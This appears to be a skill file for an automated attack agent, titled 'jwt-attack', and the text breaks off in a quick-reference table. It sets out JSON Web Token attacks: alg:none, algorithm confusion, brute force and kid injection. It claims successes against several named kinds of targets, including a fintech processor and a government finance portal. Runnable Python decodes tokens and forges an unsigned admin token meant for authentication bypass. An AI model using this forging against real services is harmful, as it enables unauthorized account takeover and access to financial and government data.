| name | jwt-attack |
| description | Decode, forge, brute JWTs when Bearer auth header is seen. |
| version | 1.1.0 |
| revision_date | "2026-07-25T00:00:00.000Z" |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, python3 |
| tags | ["recon","JWT","token","forge","brute-force"] |
| category | recon |
| related_skills | ["api-noauth-hunt","js-secrets-extraction","firebase-supabase-attack"] |
JWT Attack Skill
Complete JWT attack methodology — decode without verification, algorithm confusion (alg:none, RS256→HS256), weak secret brute force (hashcat/john/simple), kid injection, expired token reuse, and hardcoded JWT extraction from JS bundles. Confirmed on enterprise-portal (JWT-based sessions), fintech-processor (315 JWT tokens in Efí bank logs), fitness-chain (3 JWT sessions with 2027 expiry), delivery-platform (hardcoded JWTs in JS bundles), and gov-finance-portal (JWT secret leaked in Vite source).
When to Use
- API uses
Authorization: Bearer eyJ... headers.
- JavaScript bundles contain
eyJ... token patterns.
- After
js-secrets-extraction finds JWT tokens.
- After
api-noauth-hunt needs token forging for auth bypass.
- Cookies contain
jwt=, token=, or session= with base64-encoded values.
Prerequisites
terminal with curl, python3.
- JWT token to attack (from recon).
- For brute force:
hashcat or john for high-speed cracking (optional).
How to Run
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U" | python3 -c "
import sys, base64, json
parts = sys.stdin.read().strip().split('.')
if len(parts) == 3:
for i, part in enumerate(parts[:2]):
try:
padded = part + '=' * (4 - len(part) % 4)
decoded = base64.urlsafe_b64decode(padded)
print(f'--- Part {i} ---')
print(json.dumps(json.loads(decoded), indent=2))
except: print(f'Part {i}: {part[:50]}... (non-JSON)')
"
python3 -c "
import base64, json
header = base64.urlsafe_b64encode(json.dumps({'alg':'none','typ':'JWT'}).encode()).rstrip(b'=').decode()
payload = base64.urlsafe_b64encode(json.dumps({'admin':True,'sub':'admin'}).encode()).rstrip(b'=').decode()
print(f'{header}.{payload}.')
"
Quick Reference
| Attack | Prerequisites | Impact | Difficulty |
|---|
| alg:none | Server accepts |